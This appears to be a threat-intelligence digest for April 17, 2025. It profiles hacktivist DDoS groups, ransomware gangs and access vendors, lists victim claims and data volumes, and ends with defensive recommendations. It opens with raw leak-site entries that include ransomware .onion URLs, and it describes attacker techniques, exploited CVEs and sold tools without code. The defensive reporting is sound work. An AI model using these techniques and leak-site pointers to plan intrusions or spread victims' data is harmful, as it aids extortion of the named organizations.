2025-04-17T00:13RansomwareSAFEPAYGebr. Förster GmbHGermanyEnvironmental Servicesfoerster-schwanau.detorClaimed 15GB data exfiltrated.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#frapackhttps://d34iuop8pidsy8.cloudfront.net/6d76119a-419b-4aa7-a317-80f3f0872518.jpg
2025-04-17T00:13RansomwareSAFEPAYFRAPACK GmbHGermanyTransportation & Logisticsfrapack.detorClaimed 50GB data exfiltrated.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#foersterhttps://d34iuop8pidsy8.cloudfront.net/e63053e9-e5bd-4f49-b1a5-a8514d99df4a.jpg
2025-04-17T00:05RansomwareSAFEPAYGemeinde KirkelGermanyGovernment Administrationkirkel.detorClaimed 75 GB data exfiltrated.http://nz4z6ruzcekriti5cjjiiylzvrmysyqwibxztk6voem4trtx7gstpjid.onion/#kirkelhttps://d34iuop8pidsy8.cloudfront.net/67694e8b-d6f5-4d63-8bdf-6bc02de4ecc2.png

4. Threat Actor Spotlight

Understanding the specific actors behind cyber threats is crucial for effective defense. This section profiles the key threat actors identified in the April 17, 2025 incident data and supported by the available research, detailing their likely motivations, operational methods, and observed activities.

Hacktivist Groups

Hacktivist groups leverage cyberattacks, primarily DDoS, to promote political, ideological, or social agendas. Their operations often coincide with real-world events and conflicts.

  • NoName057(16):
  • Profile: A prominent pro-Russian hacktivist group that emerged in March 2022 following Russia’s invasion of Ukraine.1 Their primary motivation is geopolitical, aiming to disrupt and destabilize Ukraine and NATO member states or other countries perceived as supporting Ukraine.1 They operate with the goal of silencing anti-Russian narratives and undermining support networks for Ukraine.1 The group may collaborate with others, such as the People’s Cyber Army (PCA), within broader pro-Russian cyber coalitions like CARRtel.21
  • TTPs: NoName057(16) specializes in DDoS attacks. They developed and utilize a custom tool named “DDoSia,” a multi-threaded application designed to overwhelm target websites with network requests.1 To amplify their attacks, they build botnets by infecting servers with the Bobik malware, often distributed via the RedLine Stealer.1 Telegram serves as their central hub for communication, coordination, claiming responsibility for attacks, recruiting volunteers, and disseminating propaganda to tens of thousands of subscribers.1 They have also used GitHub to host their DDoS tool and related resources.22 While primarily focused on DDoS, they have occasionally employed other tactics like phishing websites.1 Reports suggest a success rate of around 40% for their attacks, indicating a notable level of effectiveness.1
  • Observed Activity (Apr 17): This group was highly active, claiming responsibility for numerous DDoS attacks targeting a wide array of Ukrainian and Polish organizations. The victims spanned government agencies, defense contractors, manufacturers (including chemical and transport equipment), financial institutions, and aviation services. This activity aligns perfectly with their established modus operandi and geopolitical objectives, demonstrating a sustained and focused campaign against key Ukrainian entities and Polish supporters. Their ability to hit diverse sectors suggests a capacity for target identification and sustained operational tempo, making them a persistent disruptive threat, particularly to nations opposing Russian interests.
  • Al Ahad:
  • Profile: An Iraqi hacktivist group with a stated anti-Israeli and pro-Palestinian ideology.17 They target entities perceived as supporting Israel or Western interests.16 They may operate within larger alliances of ideologically aligned hacktivist groups, such as the Holy League, which unites pro-Palestinian and pro-Russian actors.18
  • TTPs: Their primary tactic appears to be DDoS attacks.16 They utilize Telegram for communication and attack claims. Despite announcing a planned migration to Signal in late 2024 due to Telegram’s policy changes regarding cooperation with law enforcement, the group maintained an active presence on Telegram under a modified name (“Al Ahad Security”), reposting information about pro-Palestinian cyber activities.17 This decision likely reflects the importance of Telegram’s large audience and established communication channels for hacktivist operations, which can outweigh platform-related security or privacy concerns for groups prioritizing visibility and recruitment.17
  • Observed Activity (Apr 17): Claimed DDoS attacks against the US-based imageboard 4chan and two international airports in Hungary (Budapest and Győr-Pér). The targeting aligns with a broad anti-Western stance, hitting a prominent US online platform and critical infrastructure (airports) in an EU/NATO member state.
  • NATION OF SAVIORS:
  • Profile: Limited information is available for this group beyond the April 17 incidents. Based on their name and use of DDoS tactics claimed via Telegram, they fit the general profile of a hacktivist group.
  • TTPs: Conducted DDoS attacks, using check-host.net links as proof, and announced activities on Telegram.
  • Observed Activity (Apr 17): Targeted four specific commercial establishments (spas) in Dhaka, Bangladesh. This targeting is atypical compared to the geopolitical or large-scale critical infrastructure targets usually associated with prominent international hacktivist campaigns.2 This suggests their motivations might be localized (e.g., related to social or religious issues within Bangladesh) or that they are a smaller, less strategically focused group engaging in opportunistic disruption. Further monitoring is necessary to determine their specific ideology and scope.
  • SECT0R16:
  • Profile: A hacktivist group that emerged around January 2025, potentially with Russian links.19 Their stated motivations include exposing abuses of power and corruption, with operational focus suggesting geopolitical aims against US oil infrastructure and potentially broader opposition to major powers (US, EU, Russia).19 They emphasize targeting critical infrastructure, particularly OT/ICS environments.
  • TTPs: Known for employing advanced techniques targeting SCADA systems and control panels, particularly in the oil, gas, and water sectors.19 Their methods include vulnerability exploitation, social engineering, manipulation of control interfaces, and data exfiltration. They operate collaboratively, with known alliances with Z-Pentest and OverFlame, enhancing their capabilities.19 They utilize Telegram, YouTube, and darknet forums for communication and employ sophisticated psychological manipulation and social engineering tactics in their operations and recruitment.19
  • Observed Activity (Apr 17): Claimed initial access to the heating system of Palazzo Raja, an events venue in Italy, stating the operation was aided by OverFlame. This claim, targeting a building automation system (related to OT/ICS), aligns with their documented focus on control systems, even if the target itself is not traditional critical infrastructure. It may serve as a demonstration of capability or an opportunistic target. The collaboration with OverFlame is consistent with their reported alliances.19

Ransomware Operations

Ransomware groups primarily operate for financial gain, employing encryption and data theft to extort victims. Many function under a RaaS model.

  • Sarcoma:
  • Profile: A ransomware group that surfaced in late 2023 or early 2024.6 Their motivation is financial gain through extortion.6
  • TTPs: Employs a double extortion strategy, claiming significant data exfiltration volumes and threatening publication within relatively short timeframes (typically 6-9 days in the observed incidents). They utilize strong encryption (AES-256 with RSA-4096) and have incorporated fileless execution techniques using legitimate tools like PowerShell and WMI to evade detection.6 They target a diverse range of industries and geographical locations.6
  • Observed Activity (Apr 17): Claimed compromises of five organizations across the USA, Italy, UK, and Taiwan in sectors including Real Estate, Transportation, Banking, Facilities Services, and Arts. The claimed data volumes varied significantly, from 6GB to an exceptionally large 1.6TB. This wide range might reflect diverse victim data holdings or potential exaggeration in claims to increase pressure. Their rapid emergence coupled with sophisticated TTPs suggests experienced operators may be behind this group.6
  • Qilin (Agenda):
  • Profile: A well-established RaaS operation active since July 2022.5 The ransomware is written in Go and, more recently, Rust, allowing for cross-platform attacks.6 The group has Russian-speaking origins 24 and demands high ransoms.5
  • TTPs: Offers a highly customizable RaaS platform to affiliates.5 Standard TTPs include double extortion, publishing stolen data on a dedicated leak site.5 Initial access is gained through compromised RDP, phishing, or exploiting public-facing applications like Veeam Backup & Replication (e.g., CVE-2023-27532).5 They establish persistence using scheduled tasks and employ techniques like process injection and defense evasion (e.g., rebooting into Safe Mode).5 They target both Windows and Linux systems across critical infrastructure sectors globally.5
  • Observed Activity (Apr 17): Claimed attacks against three US organizations in Manufacturing, Hospitality & Tourism, and Education. The specific, sensitive data types claimed (customer details, payroll summaries, student PII/academic records) align perfectly with their double extortion model and focus on maximizing leverage through data theft.5
  • SAFEPAY:
  • Profile: Active since October 2024.8 They claim not to operate as a RaaS, suggesting a potentially closed or private group.8 Their motivation is purely financial.8
  • TTPs: Known to gain initial access by exploiting exposed RDP endpoints.7 They employ sophisticated defense evasion techniques using LOLBins (e.g., SystemSettingsAdminFlows.exe to disable Windows Defender) and custom scripts (ShareFinder.ps1 for network reconnaissance).7 Privilege escalation is achieved via UAC bypass techniques involving COM object abuse, similar to LockBit.7 They actively terminate security processes and critical services (databases, backups, antivirus) to facilitate encryption and hinder recovery.7 They practice double extortion, notable for imposing very short deadlines (3-4 days observed) for data publication.8 Encrypted files receive a .safepay extension.7
  • Observed Activity (Apr 17): Claimed five victims, predominantly in Germany (4) and one in the UK. Targets included government, construction, architecture, and manufacturing sectors. The geographic clustering and short deadlines suggest a potentially focused campaign designed for rapid pressure and payout. Their denial of being a RaaS group, despite sophisticated TTPs and multiple victims, warrants further investigation into their structure.8
  • Space Bears:
  • Profile: A newer ransomware group, emerging in early 2024.9 They are reportedly aligned with the established Phobos RaaS platform 26 and are believed to operate from Moscow.26
  • TTPs: Target both Windows and Linux environments.9 Initial access vectors include exploiting RDP vulnerabilities, phishing emails, and software supply chain compromises.9 They employ double extortion tactics and may threaten DDoS attacks against non-compliant victims.9 A distinguishing feature is their use of a “corporate” styled data leak site, presenting a more professional facade than typical ransomware groups.9 They primarily target large enterprises and critical infrastructure.9
  • Observed Activity (Apr 17): Claimed compromises of a Taiwanese electronics manufacturer (Evertech Instrumental) and a Spanish law firm (Viñuelas Abogados). These targets fit their focus on enterprise victims. The unique corporate branding might be an attempt to differentiate themselves within the broader Phobos RaaS ecosystem or a specific psychological tactic.27
  • DragonForce:
  • Profile: Originating from Malaysia, this group initially engaged in hacktivism (pro-Palestinian) before evolving into a RaaS operation in late 2023.28 While potentially retaining some ideological roots, their current operations appear primarily financially driven. They actively recruit affiliates via forums like RAMP, offering a high commission rate (up to 80%).29
  • TTPs: Operates a RaaS supporting Windows, Linux, and ESXi environments.12 They possess a notably advanced and flexible payload builder for affiliates.12 Initial access is gained through phishing or exploiting vulnerabilities in RDP and VPN solutions, including specific CVEs like CVE-2021-44228 (Log4Shell), CVE-2023-46805/CVE-2024-21887 (Ivanti), and CVE-2024-21412 (Windows Defender bypass).12 They practice dual extortion and employ aggressive tactics, such as publishing audio recordings of ransom negotiations on their dark web DLS.12 Their DLS also features advanced CAPTCHA mechanisms to hinder automated tracking.29 They target organizations globally, with notable activity in the Middle East (Saudi Arabia).29
  • Observed Activity (Apr 17): Claimed attacks against a US city government (City of Grove) and a US IT services company (Iris ID Systems). These targets demonstrate their continued global operations targeting diverse sectors. Their use of unique pressure tactics and sophisticated tooling highlights their focus on maximizing extortion success through their RaaS platform.
  • MEDUSA:
  • Profile: A long-standing RaaS operation, active since June 2021.10 By early 2025, they had impacted over 300 victims across critical infrastructure sectors.13 While operating an affiliate model, core functions like ransom negotiation remain centrally controlled by the developers.10 Their motivation is financial.
  • TTPs: Known for double extortion and potentially triple extortion tactics (demanding further payment after an initial ransom).10 They recruit Initial Access Brokers (IABs).10 Initial access is gained via phishing or exploiting vulnerabilities like CVE-2024-1709 (ConnectWise ScreenConnect) and CVE-2023-48788 (Fortinet EMS).10 They heavily utilize Living-off-the-Land (LOTL) techniques (PowerShell, WMI, certutil) and legitimate remote access tools (AnyDesk, ConnectWise, Splashtop, etc.) for stealth and evasion.10 Defense evasion includes script obfuscation and attempts to disable EDR using vulnerable drivers (BYOVD).10 Data exfiltration often uses Rclone.10 Their encryptor is typically named gaze.exe, and encrypted files get a .medusa extension.10
  • Observed Activity (Apr 17): Claimed compromise of Lithium Americas Corp., a Canadian mining company. This targeting of a major industrial entity aligns with their history of hitting critical sectors. Their longevity and high victim count attest to the effectiveness of their stealth-focused TTPs, particularly the abuse of legitimate tools.10
  • RALord:
  • Profile: A very new RaaS group that emerged in late March 2025.11 Their ransomware is reportedly Rust-based.31 They offer a high affiliate commission (85%).11 There are potential, unconfirmed links to the older RAWorld/RAGroup.11 Motivation is financial.
  • TTPs: Operates a RaaS model where affiliates likely provide initial access.11 Their DLS is written in Russian and English and uses countdown timers to pressure victims.11 They accept various payment methods (crypto, possibly bank transfer) and offer escrow services.11 Unusually, they also offer their encryption tool for sale separately from the full RaaS program.11 Encrypted files have the .RALord extension.31 Initial victims were located in South America and Europe.11
  • Observed Activity (Apr 17): Claimed compromise of Bio-Clima Service Srl, an Italian medical equipment manufacturer. This adds another European target to their early victim list, likely reflecting opportunistic targeting as they establish their operation. Their use of Rust aligns with modern ransomware development trends aimed at performance and evasion.31 The flexible RaaS structure aims to attract affiliates quickly in a competitive market.11

Initial Access & Tool Vendors

These actors facilitate cybercrime by providing the necessary entry points or tools for other attackers.

  • cryptoday:
  • Profile: An actor observed operating on the exploit[.]in underground forum. Their moniker might suggest an interest or involvement in cryptocurrency-related activities.32
  • TTPs/Activity (Apr 17): Offered administrative access credentials for a WordPress WooCommerce online shop belonging to an unidentified US organization.
  • Significance: This activity directly supplies high-privilege access to e-commerce platforms, which are valuable targets for financial fraud, payment card skimming, customer data theft, and ransomware deployment. It exemplifies the specialized market for specific types of initial access.
  • Xirosina:
  • Profile: An actor observed operating on the exploit[.]in underground forum.
  • TTPs/Activity (Apr 17): Advertised the sale of software designed for checking corporate access credentials and performing brute-force attacks. The tool targets common enterprise perimeter services, including VPNs, ADFS, Citrix, CPanel, RDWeb, and Outlook Web App (OWA). It reportedly includes support for using proxies to obfuscate the attacker’s origin and evade detection.
  • Significance: This highlights the availability of specialized, automated tools that lower the barrier for conducting widespread initial access attempts against common corporate infrastructure components. The focus on frequently targeted services 5 and the inclusion of evasion features (proxy support) indicate a tool designed to facilitate the critical first stage of many network intrusions.

Table 2: Threat Actor Overview (Observed April 17, 2025)

Threat ActorTypePrimary Motivation(s)Key TTPsPrimary Targets (Observed/Reported)Communication Platform(s)Notable Characteristics
NoName057(16)HacktivistGeopolitical (Pro-Russian)DDoS (DDoSia tool, Bobik botnet), Telegram coordination, GitHub hosting 1Ukraine, Poland (Govt, Defense, Mfg, Finance, Aviation) 1Telegram, GitHubHigh volume DDoS, strong geopolitical alignment, ~40% success rate.1
Al AhadHacktivistGeopolitical (Pro-Palestine)DDoS, Telegram coordination (maintained despite Signal move attempt) 16USA (Social Media), Hungary (Airports) 16Telegram (Signal attempted)Part of anti-Israel/anti-Western hacktivist ecosystem.16
NATION OF SAVIORSHacktivistUnclear (Potentially Local)DDoS, Telegram claimsBangladesh (Hospitality, Cosmetics)TelegramAtypical targeting (local commercial) compared to major geopolitical groups.
SECT0R16HacktivistGeopolitical/Anti-CorruptionAdvanced OT/ICS targeting (SCADA), Vuln exploit, Social Eng, Alliances (Z-Pentest, OverFlame) 19Italy (Building Control – claimed), US/NL (Oil/Water reported) 19Telegram, Dark ForumsFocus on critical infrastructure control systems, psychological manipulation tactics.19
SarcomaRansomwareFinancialDouble Extortion, Large data claims (up to 1.6TB), Short timelines, AES/RSA encryption, Fileless exec 6USA, Italy, UK, Taiwan (Real Estate, Transport, Banking, Facilities, Arts)TorRapid emergence, sophisticated TTPs, aggressive extortion.6
Qilin (Agenda)Ransomware (RaaS)FinancialCustomizable RaaS, Double Extortion, RDP/Phishing/Vuln access (CVE-2023-27532), Evasion (Safe Mode) 5USA (Mfg, Hospitality, Education), Global Critical Infra 5TorGo/Rust based, Russian-speaking origins, targets Windows/Linux.5
SAFEPAYRansomwareFinancialDouble Extortion, RDP access, LOLBins/Scripting evasion, UAC Bypass, Process Termination, Short deadlines 7Germany, UK (Govt, Construction, Architecture, Mfg) 7TorClaims not RaaS 8, sophisticated TTPs, very short (3-4 day) deadlines.
Space BearsRansomware (RaaS)FinancialDouble Extortion, RDP/Phishing/Supply Chain access, Potential DDoS threat, Phobos RaaS aligned 9Taiwan, Spain (Electronics Mfg, Law), Large Enterprises/Infra 9TorMoscow-based (alleged) 26, unique “corporate” leak site branding.9
DragonForceRansomware (RaaS)Financial (Ex-Hacktivist?)Advanced RaaS builder, Double Extortion, Phishing/RDP/VPN access (CVEs), Publishes audio, CAPTCHA DLS 12USA (Govt, IT), Saudi Arabia (Real Estate reported) 29Tor, RAMP ForumMalaysian origins 28, high affiliate commission (80%) 12, aggressive/unconventional tactics.12
MEDUSARansomware (RaaS)FinancialDouble/Triple Extortion, IAB recruitment, LOTL/Legit tool abuse, Evasion (BYOVD), Rclone exfil 10Canada (Mining), Global Critical Infra (>300 victims) 13TorLong active (since 2021), high victim count, stealth focus via LOTL.10
RALordRansomware (RaaS)FinancialNew RaaS (Rust), Double Extortion, High commission (85%), Sells tool separately, Escrow option 11Italy (Medical Mfg), S. America/Europe (initial targets) 11Tor, Cybercrime ForumVery recent emergence (Mar 2025), potential RAWorld links.11
cryptodayInitial Access VendorFinancialSelling WP WooCommerce admin accessUSA (Unidentified Org)Openweb Forum (exploit.in)Provides direct access to valuable e-commerce targets.
XirosinaTool VendorFinancialSelling Corp Access Checker/Brute-Forcer (VPNs, Web Panels, OWA) with proxy supportNot ApplicableOpenweb Forum (exploit.in)Provides automated tools for initial compromise attempts against common enterprise services.

Analysis of the incidents from April 17, 2025, reveals several prominent trends and techniques employed by threat actors, reflecting the current state of the cyber threat landscape.

DDoS Campaigns: Geopolitics and Tactics

  • Geopolitical Motivation: The overwhelming majority of DDoS attacks observed were directly linked to ongoing geopolitical conflicts. NoName057(16)’s campaign against Ukraine and Poland is a clear example of hacktivism being used as a tool in the Russia-Ukraine war, aiming to disrupt infrastructure and demonstrate opposition.1 Similarly, Al Ahad’s targeting aligns with pro-Palestinian/anti-Western sentiments often tied to the Israeli-Palestinian conflict.16 This trend highlights how nation-state conflicts spill over into cyberspace, with non-state actors (or potentially state-sponsored fronts 2) using DDoS as a low-cost, high-visibility weapon.
  • Tooling and Coordination: Groups like NoName057(16) utilize custom tools like DDoSia, likely deployed via botnets built using malware such as Bobik.1 Coordination and target dissemination heavily rely on platforms like Telegram, which enables rapid communication and mobilization of participants within large subscriber bases.1 The use of public proof-of-downtime services (check-host.net) is standard practice for claiming success.
  • Targeting Strategy: DDoS targets are often selected for maximum disruption or symbolic value. Attacks against government websites, financial institutions, and transportation services aim to impede daily life and state functions.1 Targeting critical infrastructure, including energy and potentially OT/ICS environments 3, represents a more severe escalation. Symbolic targets like media outlets or specific websites (e.g., 4chan) are chosen for propaganda value or to express ideological opposition.
  • Hacktivist Alliances: The cyber landscape features collaborations between hacktivist groups. Examples include the CARRtel alliance involving PCA and NoName057(16) 21, the Holy League uniting pro-Russian and pro-Palestinian groups 18, and the partnership between SECT0R16 and OverFlame.23 These alliances can pool resources, share TTPs, and enable more complex or widespread campaigns.
  • Impact and Evolution: While often perceived as less sophisticated than other attack types, DDoS campaigns by groups like NoName057(16) demonstrate significant disruptive potential, achieving reported success rates of around 40%.1 The trend appears to be shifting from simple website takedowns towards more strategic disruption of essential services, potentially blurring the lines with state-sponsored operations, especially when objectives align.2

Ransomware Modus Operandi

The ransomware incidents observed on April 17 showcase a mature, adaptable, and highly damaging criminal enterprise.

  • RaaS Dominance: The Ransomware-as-a-Service model is prevalent, with groups like Qilin, DragonForce, MEDUSA, RALord, and Space Bears (via Phobos alignment) operating affiliate programs.5 This model allows core developers to focus on malware development and infrastructure, while affiliates specialize in gaining initial access and deploying the ransomware. High commission rates (e.g., 80-85% for DragonForce, RALord) incentivize affiliate participation.11
  • Double/Triple Extortion: This is the standard operating procedure. Attackers first exfiltrate sensitive data before encrypting systems.5 The primary leverage then becomes the threat of publishing this stolen data on a public DLS hosted on Tor, rather than solely relying on the need for decryption. Some groups, like MEDUSA, may engage in triple extortion, demanding further payments after an initial ransom.10 Aggressive tactics are common, including short payment deadlines (SAFEPAY, Sarcoma) and publishing negotiation details (DragonForce).8
  • Data Exfiltration Focus: The claims made by ransomware groups consistently highlight the theft of specific, high-value data types: Personally Identifiable Information (PII), financial records, customer databases, intellectual property, employee records (including passport IDs), student data (including academic and special needs information), legal documents, and health information. This demonstrates a deliberate focus on acquiring data that maximizes reputational damage, regulatory risk (e.g., GDPR, HIPAA), and operational impact for the victim, thereby increasing the pressure to pay the ransom.
  • Initial Access Vectors: Common methods used by ransomware affiliates to breach networks include exploiting vulnerabilities in Remote Desktop Protocol (RDP) 7, conducting phishing campaigns to steal credentials 5, and exploiting known vulnerabilities (CVEs) in public-facing applications and VPN solutions.5 Many RaaS operations rely on Initial Access Brokers (IABs) who specialize in gaining and selling network access.10
  • Evasion Techniques: Ransomware actors continuously refine their techniques to bypass security controls. This includes heavy reliance on Living-off-the-Land (LOTL) techniques, abusing legitimate system tools like PowerShell and WMI.10 Using legitimate remote administration tools (AnyDesk, ConnectWise, etc.) helps blend malicious activity with normal administrative tasks.10 Script obfuscation 10, fileless execution 6, UAC bypass techniques 7, and actively disabling security software and deleting logs 7 are common practices. The adoption of modern programming languages like Rust (used by Qilin, RALord) may also offer advantages in performance and evasion.24
  • Infrastructure: The Tor network remains essential for ransomware operations, providing anonymity for hosting DLSs and facilitating communication and negotiation with victims.5

The ransomware ecosystem functions as a highly professionalized illicit industry. Specialization (developers, affiliates/IABs, negotiators), continuous technical innovation focused on evasion, and the strategic shift towards data exfiltration as the primary extortion lever make it a formidable and adaptive threat.

Table 3: Ransomware Claims Summary (April 17, 2025)

Threat ActorVictim OrganizationVictim CountryVictim IndustryClaimed Data VolumeClaimed Data Types (Examples)Publication Deadline (Days from report)
SarcomaKaye Lifestyle HomesUSAReal Estate521GBEmployee Passport IDs, Budget Reports, Employment Slips6-7
SarcomaTralfoItalyTransportation & Logistics34GBID cards, Transport confirmations6-7
SarcomaManchester Credit Union LimitedUKBanking & Mortgage6GBIDs, Financial Reports, PII, Membership Applications7-8
SarcomaSchultz Industries, Inc.USAFacilities Services61GBClaim/Payment info, Loss settlement6-7
SarcomaJu Percussion Group FoundationTaiwanArts & Crafts1.6TBNational IDs, Insurance reports, Labor compensation slips8-9
QilinUniversal Window and Door LLCUSAManufacturing35GBCustomer details, Shipping addresses, Payroll, QuotesNot specified
QilinYankee TrailsUSAHospitality & Tourism96GBPassport, Credit card auth formsNot specified
QilinBertie County Public SchoolsUSAEducation50GBContracts, Student PII (Name, ID, GPA), Incident reports, IEPsNot specified
SAFEPAYStadt HeilbronnGermanyGovernment Administration85GBNot specified3-4
SAFEPAYKellermann & Engelhardt ITEC GmbHGermanyBuilding and construction70GBNot specifiedNot specified
SAFEPAYHeinrich + Steinhardt GmbHGermanyArchitecture & Planning49GBNot specified3-4
SAFEPAYHelix ToolUKManufacturing239GBNot specified3-4
SAFEPAYHurst + Schröder GmbHGermanyManufacturing239GBNot specified3-4
Space BearsEvertech Instrumental Co., Ltd. (ETI)TaiwanElectrical & Electronic Mfg.Not specifiedDatabases, Financial docs, Employee/Client PII6-7
Space BearsViñuelas AbogadosSpainLaw Practice & Law FirmsNot specifiedClient legal info, Financial docs, Employee/Client PII7-8
DragonForceCity of GroveUSAGovernment Administration78.92GBNot specified5-6
DragonForceIris ID Systems IncUSAInformation Technology (IT) Services204.66GBNot specified5-6
MEDUSALithium Americas Corp.CanadaMining/MetalsNot specifiedNot specified (Sample screenshots available)8-9
RALordBio-Clima Service SrlItalyMedical Equipment Manufacturing50GBNot specified7-8

The Market for Illicit Access and Tools

The incidents involving ‘cryptoday’ and ‘Xirosina’ highlight the crucial role of the underground economy that supports and enables cyberattacks.

  • Initial Access Brokers (IABs): Actors like ‘cryptoday’ specialize in gaining unauthorized access to networks or specific high-value accounts (like the WP WooCommerce admin access) and then selling that access to other criminals.10 This creates a supply chain where ransomware groups or other attackers can purchase ready-made entry points, bypassing the often time-consuming reconnaissance and initial exploitation phases.
  • Tooling: The availability of specialized software, such as the corporate access checker/brute-forcer advertised by ‘Xirosina’, democratizes attack capabilities. These tools automate common attack techniques like credential stuffing or brute-forcing against prevalent enterprise services (VPNs, webmail, remote access panels), allowing less skilled actors to conduct attacks or enabling sophisticated actors to scale their operations.33
  • Platforms: Underground forums, often accessible via the open web or Tor, serve as marketplaces where IABs and tool vendors connect with buyers. Forums like exploit[.]in are known hubs for this type of illicit commerce.

This readily accessible market for initial access and attack tools acts as a significant force multiplier for cybercrime. It lowers the barrier to entry for aspiring criminals and streamlines operations for established groups, contributing directly to the high volume and success rate of attacks like ransomware.

6. Concluding Remarks and Strategic Outlook

Synthesis of Findings

The cyber threat landscape, as exemplified by the activity on April 17, 2025, remains volatile and multifaceted. Key observations include:

  1. Geopolitically Motivated DDoS: Hacktivist groups, notably NoName057(16), continue to leverage DDoS attacks as a primary tool for disruption and protest, closely aligning their campaigns with real-world conflicts like the Russia-Ukraine war.
  2. Diverse and Sophisticated Ransomware: The ransomware ecosystem is characterized by numerous active groups employing the RaaS model and standardized double extortion tactics. These groups demonstrate continuous evolution in their TTPs, focusing on stealth, evasion, and maximizing pressure through data theft.
  3. Critical Role of Underground Markets: The availability of initial access credentials and specialized attack tools on underground forums significantly enables and accelerates cybercrime operations, particularly ransomware.
  4. Platform Specialization: Threat actors utilize specific platforms based on their needs: Telegram for hacktivist communication and coordination, Tor for anonymous ransomware infrastructure, and dedicated forums for illicit trade.

Interconnectedness

These different facets of the threat landscape are often interconnected. IABs provide the crucial first step for many ransomware attacks. Hacktivist groups may form alliances or potentially operate with tacit or direct state support, blurring lines.2 Tools developed for one purpose can be repurposed by various actors. Understanding these connections is vital for comprehending the full scope of the threat environment.

Broader Implications

Several broader implications arise from this analysis:

  • Blurring Motivations: The traditional distinction between ideologically motivated hacktivists and financially motivated cybercriminals is becoming less clear. Groups like DragonForce evolved from hacktivism to RaaS 28, while others like Dark Storm Team appear to blend political messaging with financial schemes like cryptocurrency promotion.34 This convergence makes actor attribution and predicting future actions more challenging, as motivations may be mixed or shift based on opportunity.
  • Growing OT/ICS Risk: The targeting of Operational Technology and Industrial Control Systems, explicitly mentioned in the profile of SECT0R16 19 and reflected in broader trends of attacks on critical infrastructure 3, signifies an increasing risk of cyberattacks causing physical disruption. Compromising systems that control physical processes (e.g., energy grids, water treatment 2, manufacturing lines, building automation) elevates the potential impact far beyond data loss or financial harm.
  • Necessity for Adaptive Defense: The constant evolution of ransomware TTPs—including the heavy use of LOTL techniques 13, adoption of newer programming languages like Rust 31, rapid exploitation of new CVEs 10, and sophisticated evasion tactics—renders static, signature-based defenses insufficient. Effective security requires a dynamic, adaptive strategy focused on behavioral analysis, anomaly detection, and proactive threat hunting to identify and counter threats that bypass traditional prevention measures.

Strategic Recommendations

Based on the observed threats and trends, organizations should prioritize the following strategic security measures:

  1. DDoS Mitigation:
  • Implement comprehensive, multi-layered DDoS protection services capable of absorbing large-volume attacks and filtering malicious traffic. This is especially critical for government, financial services, and critical infrastructure sectors frequently targeted by hacktivists.
  • Utilize Web Application Firewalls (WAFs) to protect against application-layer attacks.
  • Consider rate limiting, geo-blocking for irrelevant regions, and CAPTCHA challenges for public-facing services.1
  • Maintain and regularly test DDoS-specific incident response plans.
  1. Ransomware Defense (Multi-Layered Approach):
  • Prevention:
  • Vulnerability Management: Implement aggressive and timely patching, prioritizing vulnerabilities known to be exploited by ransomware groups (e.g., those affecting VPNs, RDP, common enterprise software).10
  • Secure Remote Access: Harden RDP configurations, enforce strong authentication (MFA), limit exposure, and monitor usage closely. Secure VPN implementations.7
  • Email Security: Deploy advanced email filtering solutions to detect and block phishing attempts, malicious attachments, and malicious links.5
  • User Training: Conduct regular security awareness training focusing on phishing identification, credential security, and safe browsing habits.24
  • Principle of Least Privilege: Restrict user and service account permissions to the minimum necessary.
  • Detection:
  • Endpoint Detection and Response (EDR/XDR): Deploy solutions with strong behavioral detection capabilities to identify LOTL techniques, suspicious script execution (PowerShell), process injection, credential dumping (Mimikatz), and unauthorized use of administrative tools (PsExec, remote access software).10
  • Network Monitoring & Segmentation: Monitor internal network traffic for anomalous activity and lateral movement. Implement network segmentation to contain breaches and limit the spread of ransomware.24
  • Data Exfiltration Detection: Monitor for large or unusual outbound data transfers, potentially using tools like Rclone.10
  • Response & Recovery:
  • Backups: Maintain robust backup strategies with immutable, offline (air-gapped), and regularly tested backups.24 Ensure backup integrity and rapid recovery capabilities.
  • Incident Response Plan: Develop and regularly exercise a comprehensive IR plan that specifically addresses ransomware and double extortion scenarios, including legal counsel engagement, data breach notification procedures, public relations strategy, and decision-making regarding ransom payment. Consider establishing a retainer with a professional IR firm.
  1. Initial Access Prevention:
  • Perimeter Hardening: Secure all internet-facing systems and services.
  • Multi-Factor Authentication (MFA): Enforce MFA across all accounts, especially privileged ones and remote access points.
  • Credential Security: Implement strong password policies and monitor for credential leaks.
  • Threat Intelligence: Monitor underground forums and marketplaces for mentions of company assets or compromised credentials being sold.
  1. OT/ICS Security:
  • Organizations with OT environments must implement specific security controls, including robust IT/OT network segmentation, OT-specific monitoring and threat detection, vulnerability management tailored for ICS, secure remote access protocols, and physical security measures. Understand TTPs specific to OT environments.19
  1. Continuous Threat Intelligence:
  • Maintain awareness of the evolving threat landscape, including active threat actors, their TTPs, targeted vulnerabilities, and sectors/regions of focus. Utilize threat intelligence feeds, participate in information sharing groups (ISACs/ISAOs), and consume regular security reporting.

Forward Look

The convergence of geopolitical tensions and sophisticated cybercrime techniques suggests the current high level of threat activity will likely persist. Expect continued DDoS campaigns linked to global conflicts, potentially increasing in sophistication or targeting impact. Ransomware will remain a dominant threat, with actors further refining evasion techniques, potentially increasing focus on OT environments, and continuing to blur motivational lines by incorporating elements of hacktivism or other illicit activities. The underground markets for access and tools will continue to fuel these threats. Consequently, organizations must prioritize building cyber resilience through adaptive security strategies, robust incident response capabilities, and continuous vigilance informed by actionable threat intelligence.

Works cited

  1. Unmasking NoName057(16) – CybelAngel, accessed April 17, 2025, https://cybelangel.com/unmasking-noname05716/
  2. Hacktivism Offers Plausible Deniability for State-Backed Cyber Actors – Stratfor, accessed April 17, 2025, https://worldview.stratfor.com/article/hacktivism-offers-plausible-deniability-state-backed-cyber-actors
  3. Ransomware, state actors, hacktivists exploited geopolitical tensions to target critical infrastructure in 2024 – Industrial Cyber, accessed April 17, 2025, https://industrialcyber.co/reports/ransomware-state-actors-hacktivists-exploited-geopolitical-tensions-to-target-critical-infrastructure-in-2024/
  4. Weekly Top 10: 02.17.2025: DragonRank Seen Exploiting IIS …, accessed April 17, 2025, https://innovatecybersecurity.com/security-threat-advisory/weekly-top-10-02-17-2025-dragonrank-seen-exploiting-iis-servers-across-asia-postgresql-vulnerabilities-used-to-breach-beyondtrust-sarcoma-ransomware-operation-breached-unimicron-and-more/
  5. Threat Actor Profile: Qilin Ransomware Group – Cyble, accessed April 17, 2025, https://cyble.com/threat-actor-profiles/qilin-ransomware-group/
